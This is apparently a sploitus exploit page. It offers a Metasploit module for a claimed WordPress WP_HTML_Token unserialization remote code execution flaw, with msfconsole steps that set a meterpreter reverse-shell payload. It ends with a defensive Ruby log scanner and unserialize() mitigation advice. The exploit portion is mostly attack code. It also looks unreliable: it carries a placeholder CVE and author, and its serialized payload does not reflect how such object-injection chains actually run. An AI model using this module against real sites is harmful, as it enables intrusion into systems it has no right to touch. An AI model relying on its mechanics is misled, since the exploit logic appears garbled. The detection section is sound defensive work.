## https://sploitus.com/exploit?id=9B4CDCBD-945B-52C4-AC76-5135772CE450
To create a Metasploit module that exploits the RCE vulnerability in WordPress via the unserialization of instances of the `WP_HTML_Token` class, we'll focus on crafting a payload that triggers the unserialization flaw, leading to arbitrary code execution.

### Metasploit Module

Save the following code as `wordpress_wp_html_token_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP_HTML_Token Unserialization RCE',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in WordPress via
        the unserialization of instances of the `WP_HTML_Token` class. This allows for
        code execution via its `__destruct()` magic method.
      },
      'Author'         =>
        [
          'Your Name'  # OneArch
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-XXXX'],  # Replace with the correct CVE number
          ['URL', 'https://example.com/advisory']  # Replace with an advisory link if available
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [
        ['WordPress <= 5.x', { }]
      ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'Payload'        =>
        {
          'BadChars' => "\x00",
        }
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The base path to the WordPress installation", '/']),
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'wp-login.php'),
    })

    if res && res.code == 200 && res.body.include?('wp-login.php')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Sending payload to trigger unserialization vulnerability")

    serialized_payload = 'O:13:"WP_HTML_Token":1:{s:13:"__destruct";s:' + payload.encoded.length.to_s + ':"' + payload.encoded + '";}'

    post_data = {
      'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
      'user_pass'  => serialized_payload,
      'wp-submit'  => 'Log In',
      'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
      'testcookie' => 1
    }

    send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'wp-login.php'),
      'vars_post' => post_data
    })

    handler
  end
end
```

### Usage Instructions

1. **Save the Module**:
   Save the module as `wordpress_wp_html_token_rce.rb` in the `modules/exploits/multi/http` directory of your Metasploit Framework installation.

   ```bash
   /path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
   ```

2. **Load Metasploit**:
   Start Metasploit Framework by opening a terminal and running:

   ```bash
   msfconsole
   ```

3. **Use the New Module**:
   In the Metasploit console, load the new exploit module using the following command:

   ```bash
   use exploit/multi/http/wordpress_wp_html_token_rce
   ```

4. **Configure and Run**:
   Set the necessary options, such as `RHOSTS`, `RPORT`, `TARGETURI`, and `PAYLOAD`. Then run the module.

   ```bash
   msf6 > use exploit/multi/http/wordpress_wp_html_token_rce
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip
   RHOSTS => target_ip
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI /
   TARGETURI => /
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD php/meterpreter/reverse_tcp
   PAYLOAD => php/meterpreter/reverse_tcp
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip
   LHOST => your_ip
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444
   LPORT => 4444
   msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run
   ```

### Important Considerations

- Ensure you have the appropriate permissions before testing or exploiting any systems.
- This module is designed for educational and testing purposes. Always test in a safe and controlled environment before using it on any production systems.

This Metasploit module sends a crafted serialized payload to a vulnerable WordPress instance, attempting to trigger the unserialization vulnerability and achieve arbitrary code execution. Adjust the payload and module as necessary based on the specific nature of the vulnerability and the target environment.
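From the defender's side, the observable of this technique is a PHP serialized-object token (`O:<len>:"<class>":<n>:{`) arriving in a form field that should only ever carry plain text. The following Ruby script is an added example, not part of the sploitus page or the module above: it percent-decodes captured POST bodies, finds every serialized object token, checks that the declared class-name length matches the name, and flags any class not on an allowlist. The log format, the sample requests and the empty allowlist are constructed for the example; the field names `user_login` and `user_pass` are the ones the module posts.

```ruby
require 'cgi'

# A PHP serialized object starts with O:<name length>:"<class name>":<property count>:{
# (backslashes are allowed in the name so namespaced classes are matched too).
PHP_OBJECT_RE = /O:(\d+):"([A-Za-z_][A-Za-z0-9_\\]*)":(\d+):\{/.freeze

# Classes a given endpoint may legitimately receive in serialized form.
# Constructed for this example: a login form should never carry any object at all.
ALLOWED_CLASSES = [].freeze

# Return every object token in a decoded string, noting whether the declared
# name length matches the name (a mismatch is a malformed or evasive token).
def php_objects_in(text)
  text.scan(PHP_OBJECT_RE).map do |declared_len, klass, prop_count|
    { class: klass, properties: prop_count.to_i, len_ok: klass.bytesize == declared_len.to_i }
  end
end

# Decode an application/x-www-form-urlencoded body into [field, value] pairs;
# CGI.parse percent-decodes each value so the O:...:{ marker becomes visible.
def decoded_fields(body)
  CGI.parse(body).flat_map { |field, values| values.map { |v| [field, v] } }
end

# Flag every serialized object in a request body whose class is not allowlisted
# or whose token is malformed.
def inspect_request(body, allowlist: ALLOWED_CLASSES)
  decoded_fields(body).flat_map do |field, value|
    suspicious = php_objects_in(value).reject { |o| allowlist.include?(o[:class]) && o[:len_ok] }
    suspicious.map { |o| { field: field, class: o[:class], len_ok: o[:len_ok] } }
  end
end

# Constructed log lines in the form "<timestamp> <method> <path> <body>".
# Line 2 carries a well-formed WP_HTML_Token object, line 3 one with a wrong length field.
SAMPLE_LOG = [
  '2024-08-03T10:00:01Z POST /wp-login.php log=alice&pwd=correct+horse&wp-submit=Log+In',
  '2024-08-03T10:00:07Z POST /wp-login.php user_login=ab12cd&user_pass=O%3A13%3A%22WP_HTML_Token%22%3A1%3A%7Bs%3A1%3A%22x%22%3Bi%3A1%3B%7D&wp-submit=Log+In',
  '2024-08-03T10:00:09Z POST /wp-login.php user_login=zz&user_pass=O%3A5%3A%22WP_HTML_Token%22%3A0%3A%7B%7D',
  '2024-08-03T10:00:12Z GET /wp-login.php '
].freeze

# Scan log lines and return one hash per request that carries a flagged object.
def scan_log(lines, allowlist: ALLOWED_CLASSES)
  lines.filter_map do |line|
    ts, method, path, body = line.split(' ', 4)
    next if body.nil? || body.empty?
    findings = inspect_request(body, allowlist: allowlist)
    next if findings.empty?
    { timestamp: ts, method: method, path: path, findings: findings }
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |hit|
    hit[:findings].each do |f|
      state = f[:len_ok] ? 'length ok' : 'LENGTH MISMATCH'
      puts "#{hit[:timestamp]} #{hit[:method]} #{hit[:path]}: serialized #{f[:class]} in field #{f[:field]} (#{state})"
    end
  end
end
```

Run it as-is and both POST requests carrying an object are reported while the ordinary login and the bodiless GET are not. The allowlist is deliberately empty for a login endpoint; if an application does legitimately accept serialized objects somewhere, keep the list per endpoint rather than global. On the application side the matching mitigation is to stop `unserialize()` from instantiating arbitrary classes at all, for example with PHP's `allowed_classes` option (`unserialize($data, ['allowed_classes' => false])`), or to replace PHP serialization of untrusted input with JSON.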